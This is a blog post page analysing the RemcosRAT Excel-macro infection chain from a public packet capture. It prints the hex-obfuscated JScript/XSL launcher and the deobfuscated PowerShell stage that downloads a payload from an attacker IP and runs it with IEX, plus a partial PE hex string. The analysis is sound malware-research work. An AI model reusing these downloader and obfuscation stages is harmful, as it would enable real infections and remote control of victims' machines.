<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.2.0">

<link rel="preconnect" href="https://fonts.googleapis.com" crossorigin>
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"thuri10.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"default"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="RemcosRAT is a Fileless multi-stage malware that is distributed through malicious macros in Excel files. The malware enables remote administration of infected systems to perform unintended actions.">
<meta property="og:type" content="blog">
<meta property="og:title" content="RemcosRAT Excel macro analysis">
<meta property="og:url" content="http://thuri10.github.io/2022/01/25/REMCOSrat-Macros/index.html">
<meta property="og:site_name" content="LaByte">
<meta property="og:description" content="RemcosRAT is a Fileless multi-stage malware that is distributed through malicious macros in Excel files. The malware enables remote administration of infected systems to perform unintended actions.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://thuri10.github.io/images/mal/remcosrat/chain.jpeg">
<meta property="og:image" content="http://thuri10.github.io/images/mal/remcosrat/http_filter.png">
<meta property="og:image" content="http://thuri10.github.io/images/mal/remcosrat/stage1_stream.png">
<meta property="og:image" content="http://thuri10.github.io/images/mal/remcosrat/exported_http.png">
<meta property="og:image" content="http://thuri10.github.io/images/mal/remcosrat/pehead.png">
<meta property="article:published_time" content="2022-01-25T20:20:40.000Z">
<meta property="article:modified_time" content="2022-09-23T10:12:23.781Z">
<meta property="article:author" content="Thuri">
<meta property="article:tag" content="Malware">
<meta property="article:tag" content="reverse">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://thuri10.github.io/images/mal/remcosrat/chain.jpeg">


<link rel="canonical" href="http://thuri10.github.io/2022/01/25/REMCOSrat-Macros/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://thuri10.github.io/2022/01/25/REMCOSrat-Macros/","path":"2022/01/25/REMCOSrat-Macros/","title":"RemcosRAT Excel macro analysis"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>RemcosRAT Excel macro analysis | LaByte</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">LaByte</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Messing Bits</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Pcap-Analysis"><span class="nav-text">Pcap Analysis</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage2-Downloader-atcn-jpg"><span class="nav-text">Stage2 - Downloader (atcn.jpg)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stage3-Downloader-calient-jpg"><span class="nav-text">Stage3 - Downloader (calient.jpg)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#References"><span class="nav-text">References</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Thuri</p>
  <div class="site-description" itemprop="description">Messy Bits</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/thuri10" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;thuri10" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:thuri783@gmail.com" title="E-Mail → mailto:thuri783@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/0xhexski" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;0xhexski" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
  </div>
  <div class="cc-license site-overview-item animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://thuri10.github.io/2022/01/25/REMCOSrat-Macros/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Thuri">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LaByte">
      <meta itemprop="description" content="Messy Bits">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="RemcosRAT Excel macro analysis | LaByte">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          RemcosRAT Excel macro analysis
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: January 25 2022 23:20:40" itemprop="dateCreated datePublished" datetime="2022-01-25T23:20:40+03:00">January 25 2022</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>RemcosRAT is a Fileless multi-stage malware that is distributed through malicious macros in Excel files. The malware enables remote administration of infected systems to perform unintended actions. <span id="more"></span> This is a simple guide on understanding RemcosRat infection chain. The RemcosRAT infection chain can be described as shown by image <a target="_blank" rel="noopener" href="https://twitter.com/Unit42_Intel/status/1478744612516900868">@Unit 42</a>.</p>
<p><img data-src="/images/mal/remcosrat/chain.jpeg" alt="Infection Chain"></p>
<p>The infection chain start through phishing of the targets through mail services and the final payload of the infection chain is the used for communicating through TCP port 10174 as shown in the image.</p>
<p>The samples and IOC can be downloaded from malware-traffic-analysis website <a target="_blank" rel="noopener" href="https://www.malware-traffic-analysis.net/2022/01/04/index.html">RemcosRat sample</a>.</p>
<h2 id="Pcap-Analysis"><a href="#Pcap-Analysis" class="headerlink" title="Pcap Analysis"></a>Pcap Analysis</h2><p><a target="_blank" rel="noopener" href="https://twitter.com/malware_traffic/status/1478755988023001089">Brad</a> has provided infection traffic pcap of the malware samples in his website.</p>
<p><img data-src="/images/mal/remcosrat/http_filter.png" alt="Http filter"></p>
<p>Image above shows a Filter of <strong>http</strong> traffic in wireshark used for downloading further executables into infected machine.The malware gets additional samples using <strong>GET</strong> method as highlighted.</p>
<p>From the tweet provided by <strong>unit42intel</strong>, the above link of the onedrive downloads a <code>VBS</code> file. The vbs file is not available in the onedrive at the time of writting but it is provided in malware-traffic-analysis website.</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>head</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>title</span><span class="token punctuation">></span></span>Object moved<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>title</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>head</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h2</span><span class="token punctuation">></span></span>
      Object moved to
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>a</span>
        <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>https://onedrive.live.com/download?cid=64F8294A00286885<span class="token entity named-entity" title="&amp;">&amp;amp;</span>resid=64F8294A00286885%21770<span class="token entity named-entity" title="&amp;">&amp;amp;</span>authkey=ABI3zrc6BsVUKxU<span class="token punctuation">"</span></span>
        <span class="token punctuation">></span></span>here<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span>
      <span class="token punctuation">></span></span>.
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h2</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Verify the sha256 hash of the <code>misc.vbs</code> matches the one provided in IOCs of Remcos Rat.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">@remcosrat$ shasum -a <span class="token number">256</span> misc.vbs
95c0a9e6463a2eb1bbfe3198cd4b6cd74927a209ca4ab17501c2f444494f4499  misc.vbs<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h2 id="Stage2-Downloader-atcn-jpg"><a href="#Stage2-Downloader-atcn-jpg" class="headerlink" title="Stage2 - Downloader (atcn.jpg)"></a>Stage2 - Downloader (atcn.jpg)</h2><p>Right click the <code>GET /atcn.jpg</code> url in wireshark and follow the <strong>http</strong> stream. The HTTP streams of the urls accessed by the malware as shown below.</p>
<p><img data-src="/images/mal/remcosrat/stage1_stream.png" alt="url wireshark"></p>
<p>Malware is executing a powershell script which is obsfuscated. For further analysis we can export all the http objects. To export http objects, click <code>File -&gt; Export Objects -&gt; HTTP</code> in wireshark. select saveall to download all the http objects in malware connection traffic.</p>
<p><img data-src="/images/mal/remcosrat/exported_http.png" alt="Export Http objects "></p>
<p>The downloaded files as are not images as the extensions suuggests to. They are ASCCII text files.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">file</span> atcn.jpg
atcn.jpg: ASCII text, with very long lines <span class="token punctuation">(</span><span class="token number">4130</span><span class="token punctuation">)</span>, with CRLF line terminators
$ <span class="token function">file</span> calient.jpg
calient.jpg: ASCII text, with very long lines <span class="token punctuation">(</span><span class="token number">65536</span><span class="token punctuation">)</span>, with no line terminators<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>Below is the obfuscated powershell script.</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>xsl<span class="token operator">:</span>stylesheet version<span class="token operator">=</span><span class="token string">"1.0"</span>
      <span class="token literal-property property">xmlns</span><span class="token operator">:</span>xsl<span class="token operator">=</span><span class="token string">"http://www.w3.org/1999/XSL/Transform"</span>
      <span class="token literal-property property">xmlns</span><span class="token operator">:</span>msxsl<span class="token operator">=</span><span class="token string">"urn:schemas-microsoft-com:xslt"</span>
      <span class="token literal-property property">xmlns</span><span class="token operator">:</span>user<span class="token operator">=</span><span class="token string">"http://mycompany.com/mynamespace"</span><span class="token operator">></span>

 <span class="token operator">&lt;</span>msxsl<span class="token operator">:</span>script language<span class="token operator">=</span><span class="token string">"JScript"</span> <span class="token keyword">implements</span><span class="token operator">-</span>prefix<span class="token operator">=</span><span class="token string">"user"</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">!</span><span class="token punctuation">[</span><span class="token constant">CDATA</span><span class="token punctuation">[</span>


<span class="token keyword">var</span> r <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">ActiveXObject</span><span class="token punctuation">(</span><span class="token function">x0asd44</span><span class="token punctuation">(</span><span class="token string">"5368656c6c2e4170706c69636174696f6e"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">var</span> yy<span class="token operator">=</span>r<span class="token punctuation">.</span><span class="token function">ShellExecute</span><span class="token punctuation">(</span><span class="token string">"powershell.exe"</span><span class="token punctuation">,</span><span class="token function">x0asd44</span><span class="token punctuation">(</span><span class="token string">"202444436F626356456D76694A72416B484D595547573D273237253542253736253646253639253634253237253230253242253230253237253544253230253542253533253739253733253734253237253230253242253230253237253635253644253245253532253635253636253643253635253237253230253242253230253237253633253734253639253646253645253245253431253733253733253635253237253230253242253230253237253644253632253643253739253544253341253341253443253646253631253634253537253639253237253230253242253230253237253734253638253530253631253732253734253639253631253643253445253631253644253635253238253237253237253444253639253633253732253646253733253646253636253734253245253536253639253733253735253631253643253432253631253733253639253633253237253237253239253237253743253439253435253538253342253234253734253335253336253636253637253230253344253230253542253435253645253735253644253544253341253341253534253646253446253632253641253635253633253734253238253542253533253739253733253734253635253644253245253445253635253734253245253533253635253633253735253732253639253734253739253530253732253646253734253646253633253646253643253534253739253730253635253544253243253230253333253330253337253332253239253342253542253533253739253733253734253635253644253245253445253635253734253245253533253635253732253736253639253633253635253530253646253639253645253734253444253631253645253631253637253635253732253544253341253341253533253635253633253735253732253639253734253739253530253732253646253734253646253633253646253643253230253344253230253234253734253335253336253636253637253342253634253646253230253742253234253730253639253645253637253230253344253230253734253635253733253734253244253633253646253645253645253635253633253734253639253646253645253230253244253633253646253644253730253230253637253646253646253637253643253635253245253633253646253644253230253244253633253646253735253645253734253230253331253230253244253531253735253639253635253734253744253230253735253645253734253639253643253230253238253234253730253639253645253637253239253342253234253734253734253739253344253237253238253445253635253737253244253237253242253237253446253632253641253635253237253242253237253633253734253230253445253635253237253242253237253734253245253537253635253237253242253237253632253433253643253639253237253242253237253635253645253734253239253237253743253439253630253435253630253538253342253234253644253736253344253230253542253444253639253633253732253646253733253646253636253734253245253536253639253733253735253631253643253432253631253733253639253633253245253439253645253734253635253732253631253633253734253639253646253645253544253341253341253433253631253643253643253432253739253645253631253644253635253238253234253734253734253739253243253237253434253646253737253645253643253646253631253634253533253734253732253639253645253637253237253243253542253444253639253633253732253646253733253646253636253734253245253536253639253733253735253631253643253432253631253733253639253633253245253433253631253643253643253534253739253730253635253544253341253341253444253635253734253638253646253634253243253237253638253734253734253730253237253230253242253230253237253341253246253246253331253330253334253245253332253332253333253245253331253331253339253245253331253336253337253246253633253631253643253639253635253645253734253245253641253730253637253237253239253342253234253732253337253338253636253634253330253330253330253733253634253344253230253234253644253736253230253244253733253730253643253639253734253230253237253235253237253230253743253436253646253732253435253631253633253638253244253446253632253641253635253633253734253230253742253542253633253638253631253732253544253542253632253739253734253635253544253232253330253738253234253546253232253744253342253234253739253335253641253638253336253332253634253636253330253344253230253439253630253435253630253538253238253234253732253337253338253636253634253330253330253330253733253634253230253244253641253646253639253645253230253237253237253239273B246A6D3D2444436F626356456D76694A72416B484D595547572E53706C69742827252729207C20666F7245616368207B5B636861725D285B636F6E766572745D3A3A746F696E74313628245F2C313629297D3B496045605828246A6D202D6A6F696E20272729"</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">x0asd44</span><span class="token punctuation">(</span><span class="token parameter">hex</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">var</span> str <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;</span> hex<span class="token punctuation">.</span>length<span class="token punctuation">;</span> i <span class="token operator">+=</span> <span class="token number">2</span><span class="token punctuation">)</span> str <span class="token operator">+=</span> String<span class="token punctuation">.</span><span class="token function">fromCharCode</span><span class="token punctuation">(</span><span class="token function">parseInt</span><span class="token punctuation">(</span>hex<span class="token punctuation">.</span><span class="token function">substr</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> str<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token punctuation">]</span><span class="token punctuation">]</span><span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>msxsl<span class="token operator">:</span>script<span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">/</span>xsl<span class="token operator">:</span>stylesheet<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>First decode the string we are passing to <strong>ActiveXObject</strong> function.</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token keyword">function</span> <span class="token function">x0asd44</span><span class="token punctuation">(</span><span class="token parameter">hex</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
  <span class="token keyword">var</span> str <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator">&lt;</span> hex<span class="token punctuation">.</span>length<span class="token punctuation">;</span> i <span class="token operator">+=</span> <span class="token number">2</span><span class="token punctuation">)</span>
    str <span class="token operator">+=</span> String<span class="token punctuation">.</span><span class="token function">fromCharCode</span><span class="token punctuation">(</span><span class="token function">parseInt</span><span class="token punctuation">(</span>hex<span class="token punctuation">.</span><span class="token function">substr</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> str<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token function">x0asd44</span><span class="token punctuation">(</span><span class="token string">"5368656c6c2e4170706c69636174696f6e"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Executing the above javascript code, our hexstring string parameter is decoded to <code>Shell.Application</code>.</p>
<p>Below is the deobfuscated powershell script which is passed <code>shell.Application</code> as shown in the obsfucated script.</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell"><span class="token string">'[void] [System.Reflection.Assembly]::LoadWithPartialName(''Microsoft.VisualBasic'')'</span><span class="token punctuation">|</span><span class="token function">IEX</span><span class="token punctuation">;</span>
<span class="token variable">$t56fg</span> = <span class="token namespace">[Enum]</span>::ToObject<span class="token punctuation">(</span><span class="token namespace">[System.Net.SecurityProtocolType]</span><span class="token punctuation">,</span> 3072<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token namespace">[System.Net.ServicePointManager]</span>::SecurityProtocol = <span class="token variable">$t56fg</span><span class="token punctuation">;</span>
<span class="token keyword">do</span> <span class="token punctuation">&#123;</span><span class="token variable">$ping</span> = <span class="token function">test-connection</span> <span class="token operator">-</span>comp google<span class="token punctuation">.</span>com <span class="token operator">-</span>count 1 <span class="token operator">-</span>Quiet<span class="token punctuation">&#125;</span> <span class="token keyword">until</span> <span class="token punctuation">(</span><span class="token variable">$ping</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$tty</span>=<span class="token string">'(New-Object Net.WebClient)'</span><span class="token punctuation">|</span>I`E`X<span class="token punctuation">;</span>
<span class="token variable">$mv</span>= <span class="token namespace">[Microsoft.VisualBasic.Interaction]</span>::CallByname<span class="token punctuation">(</span><span class="token variable">$tty</span><span class="token punctuation">,</span><span class="token string">'DownloadString'</span><span class="token punctuation">,</span><span class="token namespace">[Microsoft.VisualBasic.CallType]</span>::Method<span class="token punctuation">,</span><span class="token string">'http://104.223.119.167/calient.jpg'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$r78fd000sd</span>= <span class="token variable">$mv</span> <span class="token operator">-</span>split <span class="token string">'%'</span> <span class="token punctuation">|</span><span class="token function">ForEach-Object</span> <span class="token punctuation">&#123;</span><span class="token namespace">[char]</span><span class="token namespace">[byte]</span><span class="token string">"0x<span class="token variable">$_</span>"</span><span class="token punctuation">&#125;</span><span class="token punctuation">;</span>
<span class="token variable">$y5jh62df0</span>= I`E`X<span class="token punctuation">(</span><span class="token variable">$r78fd000sd</span> <span class="token operator">-join</span> <span class="token string">''</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>The deobfuscated powershell script above downloads another string at the domain highlighted above. The malware gets obsfuscated strings of the <code>calient.jpg</code> url.</p>
<h2 id="Stage3-Downloader-calient-jpg"><a href="#Stage3-Downloader-calient-jpg" class="headerlink" title="Stage3 - Downloader (calient.jpg)"></a>Stage3 - Downloader (calient.jpg)</h2><p>Stage two downloads third obfuscated script strings in calient.jpg url. String is obfuscated and is larger than second stage <code>atcn.jpg</code> string. Looking at the obfuscated strings we have an interesting string referenced by <code>ftIXfysfU</code> variable.</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup">$y='[System.AppDomain]'|W0B4J;
$g55=$y.GetMethod("get_CurrentDomain")

 [String]$ftIXfysfU='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300AF89D1610000000000000000E00002210B010800004402000048<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>The string above seems to be an executable. This is because of the header file magic of PE executable. The magic number <code>4D5A</code> or ASCII characters MZ represents the beginning of the file signature of Microsoft PE file.</p>
<p><img data-src="/images/mal/remcosrat/pehead.png" alt="Http filter"></p>
<p>The python script belows decoded the bytes and returs an PE executable.</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#convert bytearray to PE</span>
remcosPE<span class="token operator">=</span><span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token builtin">bytes</span><span class="token punctuation">.</span>fromhex<span class="token punctuation">(</span><span class="token string">'4D5A90000300000004000000FFFc....'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'open.exe'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> filepe<span class="token punctuation">:</span>
    filepe<span class="token punctuation">.</span>write<span class="token punctuation">(</span>remcosPE<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>Now we have a fully RemcosRat malware, which is a .NET family malware.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">remcosrat$ <span class="token function">file</span> open.exe
open.exe: PE32 executable <span class="token punctuation">(</span>DLL<span class="token punctuation">)</span> <span class="token punctuation">(</span>console<span class="token punctuation">)</span> Intel <span class="token number">80386</span> Mono/.Net assembly, <span class="token keyword">for</span> MS Windows<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>Next step is analyzing dropped PE file.</p>
<h2 id="References"><a href="#References" class="headerlink" title="References"></a>References</h2><ol>
<li><a target="_blank" rel="noopener" href="https://www.malware-traffic-analysis.net/2022/01/04/index.html">https://www.malware-traffic-analysis.net/2022/01/04/index.html</a></li>
<li><a target="_blank" rel="noopener" href="https://twitter.com/Unit42_Intel/status/1478744612516900868/">https://twitter.com/Unit42_Intel/status/1478744612516900868/</a></li>
</ol>

    </div>

    
    
    
      


    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Malware/" rel="tag"># Malware</a>
              <a href="/tags/reverse/" rel="tag"># reverse</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/12/20/ROP-callme/" rel="prev" title="ROPEmporium callme challenge">
                  <i class="fa fa-chevron-left"></i> ROPEmporium callme challenge
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/02/07/RedLineStealer-Stealer/" rel="next" title="RedLineStealer information stealer analysis">
                  RedLineStealer information stealer analysis <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
